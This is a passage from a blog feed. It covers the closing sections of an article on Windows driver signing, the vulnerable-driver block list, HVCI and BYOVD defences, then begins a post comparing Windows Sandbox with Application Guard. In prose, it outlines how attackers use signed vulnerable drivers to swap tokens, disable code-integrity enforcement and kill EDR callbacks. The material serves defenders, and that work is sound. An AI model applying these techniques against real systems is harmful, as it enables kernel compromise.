&lt;p&gt;Authenticode signature verification is bounded below by one public-key operation and one cryptographic hash over the PE image, regardless of policy. SKCI&apos;s per-section cost is dominated by that constant. The Memory Integrity page is conspicuously silent on a published benchmark number; in practice the overhead is small but non-zero on Intel Kabylake-and-later or AMD Zen-2-and-later silicon with MBEC/GMET hardware acceleration, and meaningfully higher on the emulated Restricted-User-Mode fallback path that older silicon falls back to [@ms-hvci-vbs].&lt;/p&gt;
&lt;p&gt;WDAC allowlist evaluation is $O(\log r)$ per image on $r$ rules with a hashed index, or $O(r)$ on the naïve linear scan; the deny-rule check in &lt;code&gt;DriverSiPolicy.p7b&lt;/code&gt; follows the same bound.&lt;/p&gt;
&lt;p&gt;The gap between achievable static enforcement and the ideal &quot;block all and only the unsafe drivers&quot; is, in the limit, irreducible.&lt;/p&gt;
&lt;h3&gt;Three axes that can be improved&lt;/h3&gt;
&lt;p&gt;If the gap cannot close, it can be narrowed along three independent axes -- and the improvements that matter, look like one of these:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Reactiveness.&lt;/strong&gt; The disclosure-to-enforcement latency is months today. Forthcoming WHCP submission-time analyses can compress it.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Coverage of unknown-bad signed drivers.&lt;/strong&gt; Reputation, allowlists, and dynamic analysis at scale extend coverage beyond what a static deny list lists.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Visibility into binary contents.&lt;/strong&gt; SBOMs answer &quot;what is inside this driver?&quot; -- a question the signature alone never asked.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Each axis is the answer to a different blind spot. None substitutes for another. Section 11 returns to the SBOM axis specifically because it is the one Microsoft is building into the submission flow right now.&lt;/p&gt;
&lt;p&gt;Static signing has hit a wall it cannot push through. The only way forward is to widen the question. Two of the answers exist on other operating systems. The third is being built now.&lt;/p&gt;
&lt;h2&gt;10. The Other Two Operating Systems&lt;/h2&gt;
&lt;p&gt;Linux solved the signing half and pushed the curated-denylist half down to distribution vendors. macOS solved both by making third-party drivers stop being drivers.&lt;/p&gt;
&lt;h3&gt;Linux: signatures without a curated denylist&lt;/h3&gt;
&lt;p&gt;Linux has supported in-kernel module signing since version 3.7 (December 2012), under the configuration symbol &lt;code&gt;CONFIG_MODULE_SIG&lt;/code&gt;. The kernel documentation [@docs-kernel-module-sig] catalogues the supported algorithms: &quot;The built-in facility currently only supports the RSA, NIST P-384 ECDSA and NIST FIPS-204 ML-DSA public key signing standards.&quot; [@docs-kernel-module-sig] The choice of signature scheme is a build-time decision, and the kernel can be told to use a key embedded in the kernel image, a key loaded into the trusted keyring at runtime, or a Machine Owner Key managed by &lt;code&gt;shim&lt;/code&gt; and the platform&apos;s UEFI boot stack.&lt;/p&gt;
&lt;p&gt;The structural decision that matters is the enforcement mode. &lt;code&gt;CONFIG_MODULE_SIG_FORCE&lt;/code&gt; is the toggle. The kernel documentation describes the two settings cleanly: &quot;If this is off (ie. &apos;permissive&apos;), then modules for which the key is not available and modules that are unsigned are permitted, but the kernel will be marked as being tainted ... If this is on (ie. &apos;restrictive&apos;), only modules that have a valid signature that can be verified by a public key in the kernel&apos;s possession will be loaded.&quot; [@docs-kernel-module-sig]&lt;/p&gt;
&lt;p&gt;Most mainstream distributions ship permissive: unsigned modules taint the kernel but load. The defender-shipping-restrictive-enforcement model is real on Secure-Boot-on RHEL and modern Ubuntu, paired with the Linux &lt;em&gt;lockdown&lt;/em&gt; security module, which restricts certain root-level kernel-modification paths even on signed builds.The Linux lockdown LSM is the closest mainline-Linux analogue to HVCI&apos;s policy-out-of-reach property. The &lt;code&gt;kernel_lockdown(7)&lt;/code&gt; man page [@man7-kernel-lockdown] describes lockdown as &quot;designed to prevent both direct and indirect access to a running kernel image&quot; and enumerates the restricted surfaces: &lt;code&gt;/dev/mem&lt;/code&gt;, &lt;code&gt;/dev/kmem&lt;/code&gt;, &lt;code&gt;/dev/kcore&lt;/code&gt;, kprobes, BPF, MSR alteration, ACPI table overrides, and unsigned kexec [@man7-kernel-lockdown]. It is a partial analogue, not equivalent: lockdown still runs in the same trust domain as the kernel it polices, so a sufficient kernel exploit defeats it. HVCI&apos;s VTL0/VTL1 split is structurally stronger.&lt;/p&gt;
&lt;p&gt;What Linux does not have is the equivalent of &lt;code&gt;DriverSiPolicy.p7b&lt;/code&gt;. There is no kernel-level curated denylist of &quot;we have learned this module is unsafe; refuse to load it by name&quot;. Defenders rely on per-distribution CVE trackers, on &lt;code&gt;modprobe.blacklist&lt;/code&gt;, and on &lt;code&gt;udev&lt;/code&gt; rules to keep specific modules out. The G5 generation -- naming the &lt;em&gt;weakness&lt;/em&gt; rather than the publisher -- has no mainline Linux equivalent at the kernel-loader level.&lt;/p&gt;
&lt;h3&gt;macOS: DriverKit removes the surface&lt;/h3&gt;
&lt;p&gt;Apple&apos;s answer is structurally different. Starting with macOS Catalina 10.15 [@apple-legacy-extensions] in 2019, Apple deprecated legacy kernel extensions for third parties and pushed them onto the DriverKit [@apple-driverkit] framework instead [@apple-legacy-extensions] [@apple-driverkit].&lt;/p&gt;

Apple&apos;s user-space driver framework, introduced with macOS Catalina 10.15. Third-party drivers ship as `.dext` user-space extensions linked against a curated IOKit subset; they receive IOKit messages from the kernel and respond with the same operations they used to perform in ring zero, but the code itself runs in user mode under sandbox restrictions. The kernel side of the new model exposes a controlled message surface; the third-party side cannot directly execute kernel code.
&lt;p&gt;A &lt;code&gt;.dext&lt;/code&gt; runs in user space under a sandbox profile. It can claim devices, register for IOKit interrupts, and exchange messages with kernel-side broker code -- but it cannot, in any usable sense, execute arbitrary code in the kernel address space. The Capcom.sys class of vulnerability cannot be expressed in DriverKit: there is no IOCTL surface whose handler runs in ring zero, because the handler does not run in ring zero. Apple reinforces the boundary further with System Integrity Protection [@apple-sip] (since 2015) and, on Apple Silicon, Kernel Integrity Protection (KIP), which makes the kernel page tables read-only after boot [@apple-sip].&lt;/p&gt;
&lt;p&gt;The price was paid by Apple&apos;s IHV community. Whole categories of third-party drivers -- deep audio, virtualisation, certain security tools -- spent years migrating, and some categories took multiple macOS releases before a DriverKit equivalent of a particular kext capability existed. Apple Silicon requires explicit reduced-security mode to load &lt;em&gt;any&lt;/em&gt; legacy kext at all: Apple&apos;s Platform Security guide [@apple-kext-aux] records that &quot;Kexts must be explicitly enabled for a Mac with Apple silicon by holding the power button at startup to enter into One True Recovery (1TR) mode, then downgrading to Reduced Security and checking the box to enable kernel extensions&quot; [@apple-kext-aux].&lt;/p&gt;
&lt;h3&gt;Why Windows cannot copy Apple&lt;/h3&gt;
&lt;p&gt;The reason Windows cannot make Apple&apos;s move in the short term is operational, not architectural. Windows&apos; IHV installed base is orders of magnitude larger and less centrally controlled. Microsoft does not own its hardware vendors the way Apple owns Macs. Breaking compatibility with twenty years of shipped kernel drivers would impose unbounded migration cost on third parties Microsoft cannot direct.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Dimension&lt;/th&gt;
&lt;th&gt;Windows (2026)&lt;/th&gt;
&lt;th&gt;Linux (mainline + RHEL-class hardening)&lt;/th&gt;
&lt;th&gt;macOS (Catalina+ / Apple Silicon)&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;&lt;tr&gt;
&lt;td&gt;Default signature enforcement&lt;/td&gt;
&lt;td&gt;Mandatory on x64 since 2006&lt;/td&gt;
&lt;td&gt;Permissive (taints kernel); restrictive on hardened distros&lt;/td&gt;
&lt;td&gt;Mandatory; legacy kexts deprecated&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Curated denylist of signed-but-vulnerable artefacts&lt;/td&gt;
&lt;td&gt;&lt;code&gt;DriverSiPolicy.p7b&lt;/code&gt;, default-on since 22H2&lt;/td&gt;
&lt;td&gt;None at kernel loader; per-distro CVE trackers&lt;/td&gt;
&lt;td&gt;Not needed -- third-party kexts removed&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Policy engine isolated from kernel it polices&lt;/td&gt;
&lt;td&gt;HVCI in VTL1&lt;/td&gt;
&lt;td&gt;Lockdown LSM (same trust domain)&lt;/td&gt;
&lt;td&gt;KIP and SIP on Apple Silicon&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Third-party drivers in kernel&lt;/td&gt;
&lt;td&gt;Yes, still the model&lt;/td&gt;
&lt;td&gt;Yes&lt;/td&gt;
&lt;td&gt;No -- DriverKit user-space dexts&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Operational price of the model&lt;/td&gt;
&lt;td&gt;Compatibility carve-outs, opt-outs&lt;/td&gt;
&lt;td&gt;Permissive default&lt;/td&gt;
&lt;td&gt;Multi-year IHV migration&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;p&gt;Windows cannot move drivers to user space at Apple&apos;s speed. But it can look at &lt;em&gt;what is inside&lt;/em&gt; a driver in a way the signature alone never could. And it has been quietly building that capability since 2022.&lt;/p&gt;
&lt;h2&gt;11. What Comes Next: SBOM, Artifact Signing, Dynamic Analysis&lt;/h2&gt;
&lt;p&gt;If signatures cannot answer &quot;is this driver safe&quot;, and the block list can only ever answer &quot;is this driver known-unsafe&quot;, the next question Windows has to learn how to ask is &quot;what is inside this driver?&quot;&lt;/p&gt;
&lt;h3&gt;SBOM for drivers&lt;/h3&gt;
&lt;p&gt;A Software Bill of Materials is a structured inventory of the components, dependencies, and versions inside a software artefact. The mainstream community formats are SPDX (now at version 3.0) and CycloneDX; Microsoft contributes to and ships an open-source tool, microsoft/sbom-tool [@gh-sbom-tool], that produces SPDX-compatible SBOMs as part of a build pipeline [@gh-sbom-tool]. The repository description is plain: &quot;The SBOM tool is a highly scalable and enterprise ready tool to create SPDX 2.2 and SPDX 3.0 compatible SBOMs for any variety of artifacts. The tool uses the Component Detection libraries to detect components and the ClearlyDefined API to populate license information for these components.&quot; [@gh-sbom-tool]&lt;/p&gt;

A machine-readable inventory of components and dependencies inside a software artefact. For a Windows kernel driver, an SBOM lists the third-party static libraries linked into the PE, the open-source code paths bundled with the driver, and the versions of each, in a format (SPDX, CycloneDX) that automated tools can consume to answer &quot;is any component of this driver subject to a known vulnerability?&quot;
&lt;p&gt;The piece that affects Windows drivers specifically is the Windows Hardware Compatibility Program SBOM requirement. The Microsoft Q&amp;amp;A entry on Hardware Dev Center and CRA compliance [@ms-qa-cra] is candid: &quot;The WHCP SBOM requirement (Device.DevFund.Security.SoftwareBillofMaterials) has been deferred and will only be enforced starting in H2 2026.&quot; [@ms-qa-cra] The deferral aligns the WHCP rollout with the European Union&apos;s Cyber Resilience Act compliance window.&lt;/p&gt;

The EU Cyber Resilience Act sets phased compliance obligations for products with digital elements sold into the EU market. Among them is a requirement to produce a machine-readable SBOM that customers and regulators can inspect. Microsoft&apos;s WHCP SBOM mandate, scheduled for H2 2026, is the Windows-specific implementation of the same requirement, applied to kernel drivers submitted through the Hardware Dev Center. For regulated-industry IHVs, the WHCP gate and the CRA gate land at the same time and concern the same artefact [@ms-qa-cra].
&lt;p&gt;There is a structural problem an SBOM does not solve on its own. If the SBOM ships separately from the driver, an attacker who controls the distribution path can substitute a clean-looking SBOM for a contaminated driver. The WHCP submission flow is expected to bind the SBOM cryptographically to the artefact it describes so that a recipient can verify the binding, but the public documentation for the binding mechanism is still light beyond the WHCP SBOM mandate itself [@ms-qa-cra] [@ms-qa-cra].&lt;/p&gt;
&lt;h3&gt;Dynamic analysis at submission time&lt;/h3&gt;
&lt;p&gt;The other axis of improvement is reactiveness. Today, the typical disclosure-to-enforcement cycle for a new BYOVD driver looks like this: vendor ships, attacker exploits, researcher discloses, Microsoft adds to the quarterly published list, Windows servicing pushes to clients. The latency is months. Two recent research programmes show how dynamic analysis at scale can compress it.&lt;/p&gt;
&lt;p&gt;The first is the EURECOM/Politecnico di Milano NDSS 2026 paper on the authors&apos; publication page [@eurecom-paper]. The team built a DRAKVUF-based instrumentation layer called Kernelmon and traced every kernel function executed by signed drivers under malware-loaded workloads [@eurecom-paper]. The numbers are unusually concrete: the paper PDF [@eurecom-paper-pdf] reports that the team &quot;analyzed 8,779 malware samples that load 773 distinct signed drivers. It flagged suspicious behavior in 48 drivers, and subsequent manual verification led to the responsible disclosure of seven previously unknown vulnerable drivers&quot; [@eurecom-paper-pdf]. The companion S3 blog post [@eurecom-s3-blog] corroborates the 48-flagged / 7-disclosed numbers and notes that one of the seven received CVE-2024-26506 [@eurecom-s3-blog]. The technique is dynamic: it runs the driver under a hypervisor, watches what its IOCTL handlers actually do, and flags patterns characteristic of the BYOVD class.&lt;/p&gt;
&lt;p&gt;The second is Check Point Research&apos;s 2024 work [@cpr-byovd], which built a mass-hunt methodology around import-table signatures of risky kernel APIs and ran it across the global driver corpus. &quot;Using the same methodology, we conducted a mass hunt for new drivers that may be vulnerable, uncovering thousands of potentially at-risk drivers.&quot; [@cpr-byovd] The technique is static: it asks &lt;em&gt;what does the driver import?&lt;/em&gt; rather than &lt;em&gt;what does it do under exercise?&lt;/em&gt; Combined, the two approaches cover complementary halves of the surface.&lt;/p&gt;
&lt;p&gt;Neither currently gates Hardware Dev Center submissions. Both are candidates for the kind of submission-time check that would compress disclosure-to-enforcement latency from quarters to days.&lt;/p&gt;
&lt;h3&gt;Empirical patterns the defences have to recognise&lt;/h3&gt;
&lt;p&gt;Cisco Talos&apos;s BYOVD work, summarised in their &lt;em&gt;Exploring vulnerable Windows drivers&lt;/em&gt; post [@talos-byovd], classifies the post-load payloads attackers actually run [@talos-byovd]. Three behaviour classes dominate: token-swap escalation that overwrites the access token in the &lt;code&gt;_EPROCESS&lt;/code&gt; structure to reach SYSTEM; unsigned-code-loading that uses the kernel-write primitive to disable DSE or patch CI state; and EDR-killing that clears the kernel callback registrations endpoint detection products rely on. Each is a target for the dynamic analyses above, each is detectable by import-table heuristics, and each is what defenders see in the wild today.&lt;/p&gt;
&lt;p&gt;The historical roots are old. The Microsoft Security blog tracing the Vulnerable &amp;amp; Malicious Driver Reporting Center is direct: &quot;Multiple malware attacks, including RobinHood, Uroburos, Derusbi, GrayFish, and Sauron, have leveraged driver vulnerabilities (for example CVE-2008-3431, CVE-2013-3956, CVE-2009-0824, and CVE-2010-1592).&quot; [@ms-vdrc-blog] The payload classes have stayed remarkably stable for fifteen years.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; The structural gap between &lt;em&gt;signed&lt;/em&gt; and &lt;em&gt;safe&lt;/em&gt; cannot close. It can be narrowed along three independent axes. Reactiveness: how long disclosure-to-enforcement takes (closeable by submission-time dynamic analysis along the lines of the EURECOM NDSS 2026 paper [@eurecom-paper] [@eurecom-paper] and Check Point&apos;s mass-hunt methodology [@cpr-byovd] [@cpr-byovd]). Coverage of unknown-bad signed drivers (extended by reputation-backed allowlists like Smart App Control and by WDAC enterprise policies). Visibility into binary contents (the H2 2026 WHCP SBOM mandate [@ms-qa-cra] and the SBOM-to-artefact binding the submission flow is expected to enforce [@ms-qa-cra]). Each axis closes a different blind spot. None substitutes for another.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h3&gt;Threats the stack cannot yet absorb&lt;/h3&gt;
&lt;p&gt;Three problems remain open and uncovered by the published roadmap. The Smart App Control cold-start window leaves small IHVs whose drivers have no cloud reputation to fall through to signature, and signature alone is exactly what we already established does not answer the question. BYOVD on HVCI-off environments, prevalent in older anti-cheat configurations and on enterprise machines with legacy ISV drivers, still admits the &lt;code&gt;g_CiOptions&lt;/code&gt;-patching family from VTL0 because there is no VTL1 to keep the policy out of reach. And the shipped-vs-published block list gap, while operationally rational and individually closeable by a willing administrator, is a gap any default-on customer carries.&lt;/p&gt;
&lt;p&gt;None of those closes by algorithmic improvement. Each closes only by widening the question.&lt;/p&gt;
&lt;p&gt;What started as a yes/no signature check has become a continually expanding set of questions Windows asks before it will hand a driver the keys to ring zero. None of those questions is sufficient. All of them are necessary. And the next one is already being written into the WHCP submission flow.&lt;/p&gt;
&lt;h2&gt;12. What This Means in Practice&lt;/h2&gt;
&lt;p&gt;Three audiences, three things to do.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Administrators.&lt;/strong&gt; Confirm the stack is on. &lt;code&gt;Get-CimInstance -Namespace root\Microsoft\Windows\DeviceGuard -ClassName Win32_DeviceGuard&lt;/code&gt; returns a &lt;code&gt;SecurityServicesRunning&lt;/code&gt; array; a &lt;code&gt;2&lt;/code&gt; in the array confirms HVCI. A &lt;code&gt;DriverSiPolicy.p7b&lt;/code&gt; in &lt;code&gt;%windir%\system32\CodeIntegrity\&lt;/code&gt; confirms the in-box block list is deployed. If you can tolerate the compatibility risk, compile the published block-rules XML [@ms-driver-block-rules] into an App Control policy and deploy it (audit mode first) [@ms-driver-block-rules]. If you run Windows Server 2016, you have to deploy an explicit policy yourself because the in-box default does not apply there [@ms-driver-block-rules]. If you ship through the Hardware Dev Center, schedule the H2 2026 WHCP SBOM gate now [@ms-qa-cra]. Subscribe to the Vulnerable &amp;amp; Malicious Driver Reporting Center cadence for new disclosures [@ms-vdrc-blog].&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Driver authors.&lt;/strong&gt; Assume your IOCTL surface will be read by Check Point&apos;s import-table mass hunt [@cpr-byovd] and exercised by EURECOM&apos;s Kernelmon [@eurecom-paper] [@cpr-byovd] [@eurecom-paper]. Any handler that takes a user-supplied address and returns kernel data, or that dispatches a user-supplied function pointer, will end up on a block list on its current trajectory.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Researchers.&lt;/strong&gt; The field is wide open. The undecidability result is real, but the practical gap between what current analyses detect and what is, in principle, detectable for any specific vulnerability class is large. The NDSS 2026 paper found seven CVE-worthy drivers in a corpus of 773. The next paper will find more.&lt;/p&gt;
&lt;h3&gt;Every layer is somebody&apos;s incident report&lt;/h3&gt;
&lt;p&gt;Every layer in the 2026 stack exists because the previous one lost to a named adversary. Sony BMG XCP retired advisory signing. Stuxnet retired the assumption that a valid chain is a safe chain. Capcom.sys retired the assumption that a safe chain is a safe driver. RTCore64.sys, gdrv.sys, and KProcessHacker retired the assumption that the BYOVD class would burn itself out. Each entry on &lt;code&gt;DriverSiPolicy.p7b&lt;/code&gt; is somebody&apos;s incident report, recorded in the most permanent place Microsoft can put it -- the kernel loader&apos;s deny list.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; Windows 11 22H2 ships with a list of drivers Microsoft will not load. The next list will be longer. The story has been adversarial since 1996 and the trajectory does not reverse: every layer was added because the previous one met an attacker. The structural gap is undecidable; the engineering gap, narrowable; the work, unfinished.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2&gt;Frequently Asked Questions&lt;/h2&gt;


No. HVCI verifies the Authenticode signature at section-mapping time and enforces a write-xor-execute invariant on kernel memory; it does not analyse the driver&apos;s IOCTL surface. A signed driver with an unsafe IOCTL passes HVCI unchanged and proceeds to execute its handler in kernel mode with kernel privilege. That is what the Vulnerable Driver Block List is for: HVCI gates *who decides*; the block list gates *what gets decided*. See the Memory Integrity page [@ms-hvci-vbs] [@ms-hvci-vbs].

Yes. Microsoft publishes the source XML on the Microsoft-recommended driver block rules page [@ms-driver-block-rules] [@ms-driver-block-rules]. You can compile it into a binary App Control policy with the standard tooling and deploy it directly, picking up entries Microsoft holds back from the in-box list. Test in audit mode first because the published list is more inclusive than the shipped list and may flag drivers your environment depends on. Many defenders layer the LOLDrivers App Control policy [@gh-loldrivers] on top for community-curated coverage [@gh-loldrivers].

Windows Server 2016 does not enforce the block list by default, even when Memory Integrity is on. The block-rules page [@ms-driver-block-rules] calls this out explicitly [@ms-driver-block-rules]. If you administer Server 2016, deploy an explicit App Control policy to get the same coverage as the default-on 22H2 client.

App Control for Business (the engine formerly known as WDAC) is a policy *you* author. You define what signers, hashes, and paths are allowed; you ship and enforce the policy yourself. Smart App Control is a Microsoft-authored policy bundled with cloud reputation lookups via the Intelligent Security Graph. SAC is the consumer-friendly front end; App Control is the enterprise back end. SAC&apos;s default policy ships at `%windir%\schemas\CodeIntegrity\ExamplePolicies\SmartAppControl.xml`. SAC is consumer-only and turns itself off after 48 hours on enterprise-managed devices, where the expectation is that the operator deploys an App Control policy directly. See the Smart App Control FAQ [@ms-sac-faq] and the App Control for Business overview [@ms-appcontrol] [@ms-sac-faq] [@ms-appcontrol].

Increasingly yes. Major anti-cheat vendors have shipped HVCI-compatible kernel components since around 2023, but a meaningful tail of older configurations still requires HVCI off. On those configurations, the `g_CiOptions`-patching technique TrustedSec describes [@trustedsec-gcioptions] is back in play because the policy variable is no longer protected behind VTL1 [@trustedsec-gcioptions]. Audit your gaming-rig population if you care about coverage.

The in-box block list is Microsoft-curated with explicit compatibility holdbacks; the LOLDrivers catalogue [@loldrivers-io] is community-curated, considerably more inclusive (approximately 2,132 entries as of the source verification for this article), and ships with App Control deny policies, Sigma, YARA, ClamAV, and Sysmon detection content alongside the entries [@loldrivers-io] [@gh-loldrivers]. For threat hunting, use both. For enforcement, layer the LOLDrivers App Control policy on top of the in-box list if your environment can tolerate the compatibility risk. Check Point Research [@cpr-byovd] has documented the dual-use externality of any such public list -- attackers also read them -- but the defender net benefit of broader coverage outweighs the marginal attacker advantage on most environments [@cpr-byovd].

&lt;p&gt;&amp;lt;StudyGuide slug=&quot;vulnerable-driver-block-list-hvci-and-the-driver-signing-lifecycle&quot; keyTerms={[
  { term: &quot;Authenticode&quot;, definition: &quot;Microsoft&apos;s PKCS#7 code-signing format, used in Windows since 1996. Attests to publisher identity; does not analyse program behaviour.&quot; },
  { term: &quot;KMCS&quot;, definition: &quot;Kernel-Mode Code Signing. The mandatory load-time signature policy on 64-bit Windows since Vista x64 in 2006.&quot; },
  { term: &quot;BYOVD&quot;, definition: &quot;Bring Your Own Vulnerable Driver. An attack pattern in which an adversary installs a signed but design-vulnerable third-party driver to gain kernel capability.&quot; },
  { term: &quot;HVCI&quot;, definition: &quot;Hypervisor-protected Code Integrity, also called Memory Integrity. The Code Integrity engine running in VTL1 under a Hyper-V root, isolated from the VTL0 kernel.&quot; },
  { term: &quot;VTL&quot;, definition: &quot;Virtual Trust Level. VTL0 is the normal Windows kernel; VTL1 is the Secure Kernel and trustlets. VTL1 can read VTL0 memory but not vice versa.&quot; },
  { term: &quot;DriverSiPolicy.p7b&quot;, definition: &quot;The Microsoft-signed App Control deny policy that lists known-vulnerable signed kernel drivers and is default-on for all Windows 11 22H2 client devices.&quot; },
  { term: &quot;App Control for Business&quot;, definition: &quot;Microsoft&apos;s policy-driven application control engine, formerly WDAC. Used for both deny lists (the block list) and enterprise allowlists.&quot; },
  { term: &quot;Smart App Control&quot;, definition: &quot;Consumer-facing front end for App Control, backed by ISG cloud reputation. Available on clean Windows 11 22H2+ installs only.&quot; },
  { term: &quot;SBOM&quot;, definition: &quot;Software Bill of Materials. Machine-readable inventory of components and dependencies. Mandatory for WHCP submissions from H2 2026.&quot; },
  { term: &quot;DriverKit&quot;, definition: &quot;Apple&apos;s user-space driver framework. Third-party drivers ship as sandboxed dexts rather than kernel extensions; the BYOVD class is eliminated by construction.&quot; },
]} questions={[
  { q: &quot;Why did the Windows kernel-driver signing policy have to wait until Vista x64 to become mandatory?&quot;, a: &quot;The advisory SetupAPI-prompt model on 32-bit Windows could not be made mandatory without breaking compatibility with decades of unsigned drivers. The x64 architecture was a young platform with relatively few drivers in the field, which let Microsoft make the load-time signature requirement mandatory without disrupting an installed base.&quot; },
  { q: &quot;What single property of HVCI makes the g_CiOptions patching technique stop working?&quot;, a: &quot;HVCI runs the signature-verification and policy-consultation logic inside VTL1&apos;s Secure Kernel and uses Kernel Data Protection, exposed to VTL0 drivers as MmProtectDriverSection, to mark the VTL0 page containing g_CiOptions read-only at the second-level address translation level. The variable still resides in ci.dll&apos;s VTL0 data section, but a VTL0 ring-zero write to it faults because the SLAT mapping refuses the write -- and a live-kernel debugger attached to VTL0 cannot bypass that protection either.&quot; },
  { q: &quot;Why does Microsoft document that the published block list is more inclusive than the shipped one?&quot;, a: &quot;Some entries in the published list would block drivers that legitimate environments still depend on. Microsoft holds those entries back from the in-box DriverSiPolicy.p7b to avoid breaking existing functionality, while leaving them available in the source XML for defenders who can author their own App Control policies and accept the compatibility risk.&quot; },
  { q: &quot;Why is the BYOVD class undecidable to gate at the signing stage?&quot;, a: &quot;Whether an arbitrary signed driver exposes a kernel-write primitive through its IOCTL surface is a non-trivial semantic property of the driver&apos;s program text. Rice&apos;s theorem says no algorithm decides such properties for all programs. Static and dynamic analyses catch decidable subsets; the unrestricted class admits no complete solution.&quot; },
  { q: &quot;Why can Windows not simply move third-party drivers to user space the way macOS DriverKit did?&quot;, a: &quot;Apple owns its hardware vendors and could impose a multi-year migration on a comparatively centralised vendor community. Windows&apos; third-party IHV base is much larger and more independent; breaking compatibility with twenty years of shipped kernel drivers would impose unbounded migration cost on parties Microsoft does not direct.&quot; },
]} /&amp;gt;&lt;/p&gt;
</content:encoded><category>windows-kernel</category><category>code-signing</category><category>hvci</category><category>byovd</category><category>driver-block-list</category><category>secure-kernel</category><category>app-control</category><category>kmcs</category><author>noreply@paragmali.com (Parag Mali)</author></item><item><title>Windows Sandbox vs Windows Defender Application Guard: Two Hyper-V Sandboxes, Different Threat Models</title><link>https://paragmali.com/blog/windows-sandbox-vs-wdag/</link><guid isPermaLink="true">https://paragmali.com/blog/windows-sandbox-vs-wdag/</guid><description>Two Hyper-V-backed isolation containers shipped in Windows -- one survived, one was retired. The story of why disposable beat persistent, and what each model was actually for.</description><pubDate>Thu, 14 May 2026 00:00:00 GMT</pubDate><content:encoded>
**Two Windows features, the same plumbing, opposite fates.** Windows Sandbox (2019) and Windows Defender Application Guard (2017) both spin up a Hyper-V child partition using the Host Compute Service (HCS) API [@learn-microsoft-com-hcs-overview] on top of the same Virtualization-Based Security [@learn-microsoft-com-oem-vbs] substrate. Sandbox is disposable, on-demand, and aimed at running an untrusted executable. WDAG was persistent, automatic, and aimed at rendering an untrusted website inside Microsoft Edge. WDAG was deprecated for Edge [@learn-microsoft-com-application-guard] and then removed entirely in Windows 11 24H2 [@learn-microsoft-com-guard-overview]; Sandbox still ships. The reason is not that one model was wrong -- it is that operational economics and threat models diverged. This article explains the shared substrate, the architectural differences, the deprecation story, and what replaced WDAG in the 2026 Windows isolation stack.
&lt;h2&gt;1. The Hyper-V Isolation Layer Both Features Share&lt;/h2&gt;
&lt;p&gt;Open two Microsoft Learn pages side by side -- the Windows Sandbox architecture page [@learn-microsoft-com-sandbox-architecture] and the Microsoft Defender Application Guard overview [@learn-microsoft-com-guard-overview] -- and the descriptions almost rhyme. The MDAG overview opens by calling its container an &quot;isolated Hyper-V-enabled container&quot;; the Sandbox architecture page describes its guest as a dynamically generated, &quot;kernel-isolated&quot; Windows image that the host can destroy. Two pages, two teams, the same noun and the same verb. The two features are siblings: built by overlapping teams, on top of the exact same compute substrate, and shipped roughly two years apart.&lt;/p&gt;
&lt;p&gt;That substrate is named, and worth naming carefully, because the rest of the article rests on it.&lt;/p&gt;

The Windows API that creates, starts, configures, queries, and destroys Hyper-V &quot;compute systems&quot; -- the umbrella term Microsoft uses for either a virtual machine or a container with its own kernel. The HCS reference docs [@learn-microsoft-com-reference-apioverview] list functions like `HcsCreateComputeSystem`, `HcsStartComputeSystem`, and `HcsGetComputeSystemProperties` -- a kernel32-shaped surface for child partitions, parameterized by JSON.
&lt;p&gt;When Microsoft first documented HCS publicly, it framed it as a kernel32-equivalent for child partitions. The HCS overview [@learn-microsoft-com-hcs-overview] describes the API in terms of &lt;em&gt;compute systems&lt;/em&gt; (the umbrella term for either a virtual machine or a container with its own kernel), with &quot;configurations and properties... stored in a JSON file which will then be passed through the HCS APIs to create the compute system.&quot; The API reference [@learn-microsoft-com-reference-apioverview] notes that the DLL &quot;exports a set of C-style Windows API functions, using JSON schema as configuration&quot;; Microsoft&apos;s &lt;code&gt;hcsshim&lt;/code&gt; repository [@github-com-microsoft-hcsshim] provides the Go binding used by Moby and containerd. The framing matters. HCS is not a sandbox. It is the &lt;em&gt;mechanism&lt;/em&gt; a sandbox feature uses to ask Hyper-V for &quot;a kernel of my own, isolated from yours, please.&quot; What the consumer does with that kernel -- what it boots, what it shares, when it tears it down -- is the threat model. That is where Sandbox and WDAG diverge.&lt;/p&gt;
&lt;p&gt;Underneath HCS sits Hyper-V itself, and underneath Hyper-V sits Virtualization-Based Security (VBS).&lt;/p&gt;

A Windows feature that runs the normal Windows kernel as a Hyper-V guest, then uses a second, smaller secure kernel running at a higher Virtual Trust Level (VTL1) to isolate keys, policies, and code-integrity decisions from the main kernel. The OEM VBS guidance [@learn-microsoft-com-oem-vbs] documents the boot path: the hypervisor launches first, then hosts the NT kernel in a child partition.
&lt;p&gt;VBS itself does not run untrusted user code. Its job is to give Windows a hypervisor that ships in the box on every supported SKU and that is anchored by Secure Boot. Once that hypervisor exists, the cost of &quot;spawn a second Windows guest just for this task&quot; stops being &quot;boot a full VM (minutes, gigabytes)&quot; and starts being &quot;ask HCS for a child partition (seconds, hundreds of megabytes).&quot; Hyper-V on Windows [@learn-microsoft-com-windows-about] is the desktop face of that hypervisor; Hyper-V isolation containers [@learn-microsoft-com-hyperv-container] on Windows Server are the server face. Sandbox and WDAG are two desktop-flavored consumers of the same pipe.&lt;/p&gt;

flowchart TD
    HW[Hardware: VT-x/AMD-V, IOMMU, TPM]
    HV[Hyper-V hypervisor]
    Root[Root partition: host NT kernel]
    HCS[Host Compute Service API]
    WS[Windows Sandbox child partition]
    WDAG[WDAG child partition]
